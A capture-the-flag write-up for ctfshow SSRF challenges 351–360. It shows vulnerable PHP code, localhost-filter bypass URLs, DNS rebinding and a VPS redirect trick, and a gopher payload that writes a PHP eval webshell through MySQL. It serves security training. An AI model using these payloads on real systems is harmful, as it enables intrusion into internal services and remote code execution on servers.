ctfshow-web-351-360-ssrf-wp
目录
ctfshow-web-351-360-ssrf-wp
web351-无过滤
<?php
error_reporting(0); // 关闭错误报告,避免显示错误信息
highlight_file(__FILE__); // 高亮显示当前文件的源代码
$url = $_POST['url']; // 获取通过POST方法提交的'url'参数值
$ch = curl_init($url); // 初始化cURL会话,使用用户提供的URL
curl_setopt($ch, CURLOPT_HEADER, 0); // 设置选项:不包含HTTP头信息在输出中
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 设置选项:将cURL的输出返回为字符串,而不是直接输出
$result = curl_exec($ch); // 执行cURL会话,并将结果存储在$result变量中
curl_close($ch); // 关闭cURL会话,释放资源
echo ($result); // 输出cURL请求的结果,即将获取的网页内容显示在页面上
直接访问不行,就以本地用户去探测内网下的flag.php
url=http://127.0.0.1/flag.phpweb352 -无过滤
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
这题看似多了一个过滤,但是没有过滤句中没有变量,所以相当于没有过滤,直接打paylaod
url=http://127.0.0.1/flag.phpurl=http://localhost/flag.phpweb353-过滤localhost,127.0.0.1与。
<?php
error_reporting(0); // 关闭错误报告,避免显示错误信息
highlight_file(__FILE__); // 高亮显示当前文件的源代码
$url = $_POST['url']; // 获取通过POST方法提交的'url'参数值
$x = parse_url($url); // 使用parse_url函数解析URL,返回一个关联数组,包含URL的各个部分
// 检查解析后的URL的协议是否为http或https
if ($x['scheme'] === 'http' || $x['scheme'] === 'https') {
// 使用正则表达式检查URL是否包含localhost、127.0.0.1或中文句号
if (!preg_match('/localhost|12700||。/i', $url)) {
$ch = curl_init($url); // 初始化cURL会话,使用用户提供的URL
curl_setopt($ch, CURLOPT_HEADER, 0); // 设置选项:不包含HTTP头信息在输出中
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 设置选项:将cURL的输出返回为字符串,而不是直接输出
$result = curl_exec($ch); // 执行cURL会话,并将结果存储在$result变量中
curl_close($ch); // 关闭cURL会话,释放资源
echo ($result); // 输出cURL请求的结果,即将获取的网页内容显示在页面上
} else {
die('hacker'); // 如果URL包含localhost、127.0.0.1或中文句号,输出'hacker'并终止脚本
}
} else {
die('hacker'); // 如果URL的协议不是http或https,输出'hacker'并终止脚本
}本来可以用。绕过127.0.0.1,但是被禁用了,所以只能利用进制绕过了
127.0.0.1
十进制整数:url=http://2130706433/flag.php
十六进制:url=http://0x7F.0.0.1/flag.php
八进制:url=http://0177.0.0.1/flag.php
十六进制整数:url=http://0x7F000001/flag.php
缺省模式:127.0.0.1写成127.1
CIDR:url=http://127.127.127.127/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://127.1/flag.php
url=http://127.0000000000000.001/flag.phpweb354-过滤localhost,1,0,句号
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
直接拿一些解析到127.0.0.1的域名
http://safe.taobao.com/
http://114.taobao.com/
http://wifi.aliyun.com/
http://imis.qq.com/
http://localhost.sec.qq.com/
http://ecd.tencent.com/
web355-限制host长度小于5
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?> hacker
了解一下parse_url函数:
解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分
数组中可能的键有以下几种:
scheme - 如 http
host
port
user
pass
path
query - 在问号 ? 之后
fragment - 在散列符号 # 之后
# 例:
<?php
$url = 'http://username:password@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);
?>
# 输出
Array
(
[scheme] => http
[host] => hostname
[user] => username
[pass] => password
[path] => /path
[query] => arg=value
[fragment] => anchor
)
/path
这题也比较简单
url=http://127.1/flag.php
url=http://0/flag.phpweb356-限制host小于3
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
url=http://0/flag.php注意
0
在linux系统中会解析成
127.0.0.1
,而在windows中会解析成
0.0.0.0
web357
<?php
error_reporting(0); // 关闭错误报告,避免显示错误信息
highlight_file(__FILE__); // 高亮显示当前文件的源代码
$url = $_POST['url']; // 获取通过POST方法提交的'url'参数值
$x = parse_url($url); // 使用parse_url函数解析URL,返回一个关联数组,包含URL的各个部分
// 检查解析后的URL的协议是否为http或https
if ($x['scheme'] === 'http' || $x['scheme'] === 'https') {
$ip = gethostbyname($x['host']); // 获取URL中主机名对应的IP地址
echo '</br>'.$ip.'</br>'; // 输出获取到的IP地址
// 验证IP地址是否有效,并且不在私有或保留范围内
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
die('ip!'); // 如果IP地址无效或在私有/保留范围内,输出'ip!'并终止脚本
}
echo file_get_contents($_POST['url']); // 使用file_get_contents函数获取并输出URL的内容
} else {
die('scheme'); // 如果URL的协议不是http或https,输出'scheme'并终止脚本
}
这题有2个解法,第一个是利用dns重绑定,第二个是利用自己的vps 。具体可看下面的文章。
解法一:dns重绑定
url=http://r.你cyc的标识符.ceye.io/flag.php
(如果不行,就在hackbar多execute几次,因为可能第一次解析的是127.0.0.1然后通过不了过滤,多试几次就好了)
解法二-用自己的vps
自己vps上写一个ssrf.php
<?php
header("Location:http://127.0.0.1/flag.php");
?>
然后post传,网站就是你自服务器的网址
url=http://xx.xx.xx/ssrf.php
注意,ssrf.php需要在根目录,二就是要加上端口。
web358-正则匹配
<?php
error_reporting(0); // 关闭错误报告,避免显示错误信息
highlight_file(__FILE__); // 高亮显示当前文件的源代码
$url = $_POST['url']; // 获取通过POST方法提交的'url'参数值
// 使用正则表达式检查URL是否以"http://ctf."开头,并以"show"结尾
if (preg_match('/^http:\/\/ctf.*show$/i', $url)) {
// 如果匹配成功,使用file_get_contents函数获取并输出URL的内容
echo file_get_contents($url);
} else {
// 如果不匹配,终止脚本并输出'scheme'
die('scheme');
}payload:
url=http://ctf.@127.0.0.1/flag.php#show
url=http://ctf.@127.0.0.1/flag.php?show这里也可以很好的体现parse_url函数
<?php
$url = 'http://ctf.@127.0.0.1/flag.php?show';
$x = parse_url($url);
var_dump($x);
?>
//运行结果:
array(5) {
["scheme"]=>
string(4) "http"
["host"]=>
string(9) "127.0.0.1"
["user"]=>
string(4) "ctf."
["path"]=>
string(9) "/flag.php"
["query"]=>
string(4) "show"
}
web359-gopher协议打mysql
提示无密码打mysql,试试发现returl发现ssrf,并跳转到check.php文件
python2 gopherus.py --exploit mysqlselect "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/aa.php';
_后面再经过一次url编码
%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254c%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2527%2563%256d%2564%2527%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2561%2561%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501然后post传参
之后蚁剑连接就好
360-gopher协议打redis
题目提示打redis
跟上题差不多。 但是post上传协议一下就把环境干废了。